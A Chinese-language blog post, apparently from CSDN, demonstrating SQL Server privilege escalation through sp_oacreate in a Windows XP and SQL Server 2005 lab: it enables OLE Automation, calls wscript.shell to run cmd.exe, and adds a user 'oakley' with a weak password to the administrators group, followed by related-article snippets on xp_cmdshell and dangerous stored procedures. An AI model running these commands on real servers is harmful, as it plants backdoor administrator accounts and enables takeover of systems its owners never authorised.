【SQL Server】sp_oacreate获取服务器最高权限

最新推荐文章于 2023-10-21 13:31:06 发布
最新推荐文章于 2023-10-21 13:31:06 发布
阅读量2k 收藏
点赞数
分类专栏: 数据库安全 文章标签: mssql 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43665434/article/details/117202407
版权

【SQL Server】sp_oacreate获取服务器最高权限


前言

使用sp_oacreate的提权语句,主要是用来调用OLE对象(Object Linking and Embedding的缩写,VB中的OLE对象),利用OLE对象的run方法执行系统命令。在oacreate的官方文档里明确指出了,如果要使用OLE对象,必须要开启 ‘Ole Automation Procedures’,也就是EXEC sp_configure 'Ole Automation Procedures', 1;执行这条语句前要执行EXEC sp_configure 'show advanced options', 1; 官方对这句话的解释是:show advanced options,“显示高级选项”选项用来显示 sp_configure 系统存储过程高级选项。 当“显示高级选项” 设置为 1 时,可以使用 sp_configure 列出高级选项。 默认值为 0。

实验环境:windowsXP + sql server2005

--sp_configure的作用是显示或更改当前服务器的全局配置设置,执行成功返回0,失败返回1
exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'Ole Automation Procedures',1;reconfigure;

--使用sp_oacreate调用wscript.shell组件,将返回的对象存储到@shell变量中。
declare @shell int;
exec sp_oacreate 'wscript.shell',@shell output;
--使用sp_oamethod 调用@shell对象中的Run方法,执行添加用户的命令,null是run方法的返回值,我们不需要用返回值,所以写null.
exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user oakley 123456 /add'
exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators oakley /add'

--恢复语句EXEC
exec sp_configure 'Ole Automation Procedures', 0;RECONFIGURE;
exec sp_configure 'show advanced options', 0;RECONFIGURE;

image-20210523223715428

image-20210523223836761

利用OLE对象的run方法执行系统命令,创建一个用户oakley,并将该用户加入administrators组中:

image-20210523225744398

查看已有用户:

image-20210523225817879

oakley用户创建成功!

查看oakley用户所属组:

image-20210523225903638

提权成功!

0ak1ey
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL 不常用的一些命令sp_OACreate,xp_cmdshell,sp_makewebtask
12-14
1. 开启和关毕xp_cmdshell EXEC sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 1;RECONFIGURE;– 开启xp_cmdshell EXEC sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 0;RECONFIGURE;– 关毕xp_cmdshell EXEC sp_configure ‘show advanced options
SQL通过SP_OA调用外部HTTP
08-31
DECLARE @Object int; DECLARE @HR int; DECLARE @Property nvarchar(255); DECLARE @Return nvarchar(255); DECLARE @Source nvarchar(255), @Desc nvarchar(255); DECLARE @httpStatus int; DECLARE @response varchar(8000); --创建 OLE 对象的实例 EXEC @HR = sp_OACreate N'MSXML2.XMLHTTP.6.0',@Object OUT; IF @HR 0 BEGIN EXEC sp_OAGetErrorInfo @Object,@Source OUT,@Desc OUT; RAISERROR('Error Creating COM Component 0x%x, %s, %s',16,1, @HR, @Source, @Desc) GOTO END_ROUTINE END BEGIN --Open EXEC @HR = sp_OAMethod @Object,N'open',Null,'GET','http://localhost:1728/HttpServer/submit.aspx',FALSE; IF @HR 0 BEGIN EXEC sp_OAGetErrorInfo @Object,@Source OUT,@Desc OUT; RAISERROR('Open 0x%x, %s, %s',16,1, @HR, @Source, @Desc) GOTO CLEANUP END --setRequestHeader EXEC @HR = sp_OAMethod @Object,N'setRequestHeader',Null,'Content-Type','text/xml'; IF @HR 0 BEGIN EXEC sp_OAGetErrorInfo @Object,@Source OUT,@Desc OUT; RAISERROR('setRequestHeader 0x%x, %s, %s',16,1, @HR, @Source, @Desc) GOTO CLEANUP END --send EXEC @HR = sp_OAMethod @Object,N'send',Null,''; IF @HR 0 BEGIN EXEC sp_OAGetErrorInfo @Object,@Source OUT,@Desc OUT; RAISERROR('send 0x%x, %s, %s',16,1, @HR, @Source, @Desc) GOTO CLEANUP END --readyState EXEC @HR = sp_OAGetProperty @Object,'readyState', @httpStatus OUT; IF @HR 0 BEGIN EXEC sp_OAGetErrorInfo @Object,@Source OUT,@Desc OUT; RAISERROR('readyState 0x%x, %s, %s',16,1, @HR, @Source, @Desc) GOTO CLEANUP END --verify status IF @httpStatus 4 BEGIN RAISERROR('readyState http status bad', 16,1) GOTO CLEANUP END --status EXEC @HR = sp_OAGetProperty @Object,'status', @httpStatus OUT; IF @HR 0 BEGIN EXEC sp_OAGetErrorInfo @Object,@Source OUT,@Desc OUT; RAISERROR('getstatus 0x%x, %s, %s',16,1, @HR, @Source, @Desc) GOTO CLEANUP END --verify status IF @httpStatus 200 BEGIN Print Cast(@httpStatus As varchar) RAISERROR('Open http status bad', 16,1) GOTO CLEANUP END --responseText EXEC @HR = sp_OAGetProperty @Object, 'responseText', @response OUT IF @HR 0 BEGIN EXEC sp_OAGetErrorInfo @Object,@Source OUT,@Desc OUT; RAISERROR('responseText 0x%x, %s, %s',16,1, @HR, @Source, @Desc) GOTO CLEANUP END Print @response END CLEANUP: BEGIN EXEC @HR = sp_OADestroy @Object; IF @HR 0 BEGIN EXEC sp_OAGetErrorInfo @Object,@Source OUT,@Desc OUT; SELECT HR = convert(varbinary(4),@HR),Source=@Source,Description=@Desc; END END END_ROUTINE: RETURN; GO
sqlServer执行存储过程报错:42000,执行该sql即可
12-05
sqlServer执行存储过程报错:42000 - [SQL Server]SQL Server 阻止了对组件“Ole Automation Procedures”的 过程“sys.sp_OACreate”的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用“Ole Automation Procedures”。有关启用“Ole Automation Procedures”的详细信息,请搜索 SQL Server 联机丛书中的“Ole Automation Procedures”。
SQL Server下几个危险的扩展存储过程
01-21
这些存储过程如下: sp_makewebtask xp_cmdshell xp_dirtree xp_fileexist xp_terminate_process sp_oamethod sp_oacreate xp_regaddmultistring xp_regdeletekey xp_regdeletevalue xp_regenumkeys xp_regenumvalues sp_add_job sp_addtask xp_regread xp_regwrite xp_readwebtask xp_makewebtask xp_regremovemultistring 对应措施:删除上
SQL Server 阻止了对组件 'Ole Automation Procedures' 的 过程'sys.sp_OACreate' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'Ol
热门推荐
IT_zen的专栏
03-29 2万+
错误: SQL Server 阻止了对组件 Ole Automation Procedures 的 过程sys.sp_OACreate 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 Ole Automation Procedures。有关启用 Ole Automation Procedures 的详细信息,请参
sqlserver sp_OACreate使用例子
德州仪器
07-11 6691
T-SQL 中是可以调用 OLE 的,将这一功能应用到触发器、存储过程等对象中,SQL Server 运用变得更贴近我们的功能,更加满足我们的需要。
渗透测试——权限提升
世间繁华梦一出
03-01 1513
提权一、什么是提权二、怎样进行提权(提权的方式有哪些)1、系统漏洞提权(Linux、Windows) 一、什么是提权 提权就是通过各种办法和漏洞,提升自己在服务器中的权限,以便控制全局。 windows:User >> System linux: User >> Root 二、怎样进行提权(提权的方式有哪些) 1、系统漏洞提权(Linux、Windows) 2、数据库提权 3、系统配置错误提权 4、权限继承类提权 5、第三方软件/服务提权 6、WebServer漏洞提权 1、系统
利用数据库提权参考方法
bobo_milk的博客
11-26 1357
数据库提权方法
渗透测试---手把手教你SQL注入(12)---SQLsever利用SA权限执行系统命令--getshell
最新发布
weixin_52796034的博客
10-21 648
渗透测试---手把手教你SQL注入(10)---SQL注入拓展总结渗透测试---手把手教你SQL注入(11)---SQL注入拓展总结(SQLsever在线靶场实战)本节我们来讨论在SQLserver注入过程中的权限问题----
SQL优化:设置性能相关的服务器参数
weixin_30552811的博客
05-18 485
1、开启高级选项 --显示可以配置的选项 EXEC sp_configure go --要显示可以配置的高级选项,必须设置参数show advanced option为1 EXEC sp_configure 'show advanced option',1 reconfigure go --显示所有可以配置的选项,这里显然包括了高级选项 EXEC sp_config...
sp_OACreate 储存过程创建目录
happydreamer的专栏
01-18 3204
--sp_OACreate 储存过程调用File System Object 组件来创建目录DECLARE @object intDECLARE @hr intDeclare @tmp intdeclare @msg varchar(3000)declare @CatalogPath  nvarchar(300)Set @CatalogPath=g:/aaa   --创建文件夹的路径和名称
sql server新建有并授权, sp_configure命令
hdhai9451的专栏
09-11 6603
一、新建用户并授权 --比如要新建帐户appuser,密码为163.com,并允许该用户对appdb数据库的test表有select,insert,update权限,那么依次执行 exec sp_addlogin 'appuser','163.com','TEST' go use TEST exec sp_grantdbaccess 'appuser' go use T
SQL Server提权总结与记录-xp_cmdshell/sp_oacreate/sandbox提权
baynk的博客
05-17 4963
0x00 Sql server提权基础 Sql server也称Mssql Server,是微软家的数据库,但是要注意,sql server同样也能在linux中安装使用,本文主要记录sql server的提权方式。 sql server提权主要依赖于sql server自带的存储过程。 存储过程是一个可编程的函数,它在数据库中创建并保存,是存储在服务器中的一组预编译过的T-SQL语句。数据库中的存储过程可以看做是对编程中面向对象方法的模拟。它允许控制数据的访问方式(可以将存储过程理解为函数调用的过程),使
SQL Server 命令执行方式汇总
m0_60571990的博客
03-10 3029
SQL Server 命令执行方式汇总
操作系统权限提升(三十)之数据库提权-SQL Server sp_oacreate+sp_oamethod(dba权限)提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
09-23 491
在xp_cmdshell被删除或不能利用是可以考虑利用sp_oacreate,利用前提需要sqlserver sysadmin账户服务器权限为system(sqlserver2019默认被降权为mssql)。sp_oacreate 是一个存储过程,可以删除、复制、移动文件。还能配合 sp_oamethod 来写文件执行系统命令。
MSSQL提权
qq115399231的博客
07-20 1149
xp_cmdshell sql server 数据库可以通过xp_cmdshell组件执行一些系统命令 默认情况下xp_cmdshell是关闭的 开启xp_cmdshell EXEC sp_configure 'xp_cmdshell',1 RECONFIGURE GO xp_cmdshell为高级选项,默认不允许编辑 开启允许编辑高级选项 EXEC sp_configure 'show ...
帮我解释这段代码EXEC sp_OADestroy @Object
06-10
这段代码是用于销毁一个由 sp_OACreate 创建的 COM 对象。COM 对象是 Component Object Model 的缩写,是一种面向对象的编程模型,用于在 Windows 操作系统中实现组件化的应用程序。在使用 COM 对象时,需要先通过 sp_OACreate 创建一个对象实例,使用完毕后需要通过 sp_OADestroy 销毁对象实例,以释放相关资源。这是一个重要的操作,否则会导致资源泄漏和内存溢出等问题。因此,EXEC sp_OADestroy @Object 的作用就是销毁指定的 COM 对象实例。其中,@Object 是对象实例的引用,可以是一个变量或常量。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值